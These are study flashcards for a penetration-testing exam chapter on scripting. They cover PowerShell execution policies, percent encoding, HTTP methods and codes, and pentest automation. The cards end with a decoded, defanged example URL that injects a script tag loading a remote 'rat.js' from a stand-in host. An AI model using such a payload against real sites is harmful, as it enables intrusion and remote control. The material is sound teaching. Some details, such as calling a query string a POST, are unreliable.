Chapter 12: Scripting for Penetration Testing Flashcards
Six Languages on Test
- Bash
- PowerShell
- Ruby
- Python
- Perl
- JavaScript
PowerShell Restrictions
- Restricted: Default ps1 execution policy that blocks all use of scripts
- AllSigned: Requires any ps1 script to be signed by a trusted publisher
- RemoteSigned: Allows execution of any ps1 script that you write on the local machine, but requires scripts downloaded from internet to be signed by a trusted publisher
- Unrestricted: Allows exeuciton of any ps1 script but prompts you to confirm before you run one from the internet
- Bypass: Allows execution of any ps1 script with no warning for anything
Percent Encoding
- %00: null
- %20: Space
- %21: !
- %22: “
- %23: #
- %24: $
- %25: %
- %26: &
- %27: ‘
- %28: (
- %29: )
- %2A: *
- %2B: +
- %2C: ,
- %2D: -
- %2E: .
- %2F: /
- %5C: \
- %3F: ?
- %3C: <
- %3E: >
Flow Controls
- Conditional Statements: Diagram on page 459
- For Loops: Diagram on page 464
- While Loops: Diagram on page 470
Analyzing Exploit Code
Enumeration
* Seeks to identify all the instances of a resource in an environment
* System enum identifies all the systems on a network
* User/Account enum identifies all the individuals with access to the environment
* Domain enum seeks to identify all valid subdomains for a parent domain
Downloading Files
* Commonly done to update malicious code, obtain instructions, or import new tools
* Pay attention to these downloads since the location and nature of files downloaded may provide clues to the identity and motivation of the attackers
Launching Remote Access
* One primary goal for attackers
* Once they run exploit code, they want to create remote access capabilities that allow them to control the system
* Provides important clues to the nature and purpose of an attack
Automating Pentests
Scanning Systems
* Testers may create code that automatically performs port scans of an environment, processes the results, and then automatically triggers next steps based on the results
* EX: If port scan indicates that a web server accepts HTTPS on port 443, a follow up scan might enum the SSL/TLS ciphers supported by the server and produce a report for review
Configuration Analysis of Target Systems
* Automated code can probe the configuration of a target system and produce a report that helps ID next steps
Modifying of IP Addresses in Routine Activities
* Allows the rapid application of techniques to many different systems in an iterative fashion
* EX: Cycle through IPs in a for loop
HTTP Method
A set of request methods to indicate the desired action to be performed for a given resource
A request contains a method, a resource, a version number, the header, and the body of the request
GET
* The principal method used with HTTP and is used to retrieve a resource
POST
* Used to send data to the server for processing by the requested resource
PUT
* Creates or replaces the requested resource
DELETE
* Used to remove
HEAD
* Retrieve the headers for a resource only and igonres the body
* Often used by pentesters to banner grab information about the server and page, like the title of the page
NOTE
* Data submitted via a URL is delimited by the ? character
HTTP Response Codes
- 200 = Successful GET or POST request
- 201 = Successful PUT request to create a resource
- 3xx = Redirect from the server
- 4xx = Client request error
- 400 = Request could not be parsed by server
- 401 = Request did not supply auth creds
- 403 = Request did not have sufficient permissions
- 404 = Non-existent resource
- 5xx = Server side error
- 500 = General error on server side app
- 502 = Bad gateway when server is acting as a proxy
- 503 = Overload, service unavailability
- 504 = Gateway timeout
Example URL Analysis
hxxp://diontraining[.]com/upload.php?post=%3Cscript%3E%27http%3A%2F%2Fabc123.com%2Frat%2Ejs
hxxp://diontraining[.]com/upload.php?post=
* The website we’re going to
* The file on that website
* The action we’re going to do—POST
* Everything after the - is what we POST
%3Cscript%3E
* < script >
%2F%2Fabc123.com%2Frat%2Ejs
* ‘hxx://abc123[.]com/rat.js (defanged)
Putting It Together
* Go to diontraining dot com
* Access the file upload.php
* POST that file (upload)
* Send it to this website address
* Link to rat.js
* Trying to send a JS file to the site
* If it was vulnerable, malicious code is uploaded